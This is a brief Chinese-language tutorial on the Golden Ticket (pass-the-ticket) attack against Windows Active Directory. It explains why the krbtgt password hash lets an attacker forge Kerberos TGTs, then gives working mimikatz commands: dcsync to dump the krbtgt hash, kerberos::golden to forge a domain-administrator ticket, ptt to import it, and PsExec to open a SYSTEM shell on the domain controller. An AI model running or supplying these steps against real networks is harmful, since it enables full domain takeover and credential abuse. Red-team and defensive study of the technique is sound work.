票据传递攻击(PTT) 黄金票据

0x01 黄金票据

域中每个用户的 Ticket 都是由 krbtgt 的密码 Hash 来计算生成的，因此只要获取到了 krbtgt 用户的密码 Hash ，就可以随意伪造 Ticket ，进而使用 Ticket 登陆域控制器，使用 krbtgt 用户 hash 生成的票据被称为 Golden Ticket，此类攻击方法被称为票据传递攻击。

黄金票据就是伪造TGT （控制servername可以访问任意server）

目的是client跳过AS认证， 伪造TGT直接发给TGS请求ST，伪造TGT的重点是 krbtgt的hash 。

CT_SK统一即可。

0x02 黄金票据的伪造条件

1、域名称(net config workstation )

2、域的SID值(whoami /user)

3、域的KRBTGT账号的HASH (lsadump::dcsync /domain:test.com /all /csv)

4、伪造任意用户名(随便写)

0x03 黄金票据利用

dc执行：

首先在域控上导出krbtgt的用户hash:

mimikatz.exe log "lsadump::dcsync /domain:dbapp.lab /user:krbtgt"

在域用户上执行：

利用 mimikatz 生成域管权限的 Golden Ticket，填入对应的域管理员账号、域名称、sid值，如下：

kerberos::golden /user:Administrator /domain:dbapp.lab /sid:S-1-5-21-2476688485-4256841910-2155116890 /krbtgt:dbd96281f999cc0a3fbe58dc217ea11d /ticket:test.kirbi

kerberos::purge   \\清除票据
kerberos::tgt     \\查看票据

#导入刚才生成的票据
kerberos::ptt test.kirbi

PS: 以管理员权限运行窗口

#导入成功后可获取域管权限
dir \\dc.abc.com\c$

Psexec.exe \\dc -s cmd.exe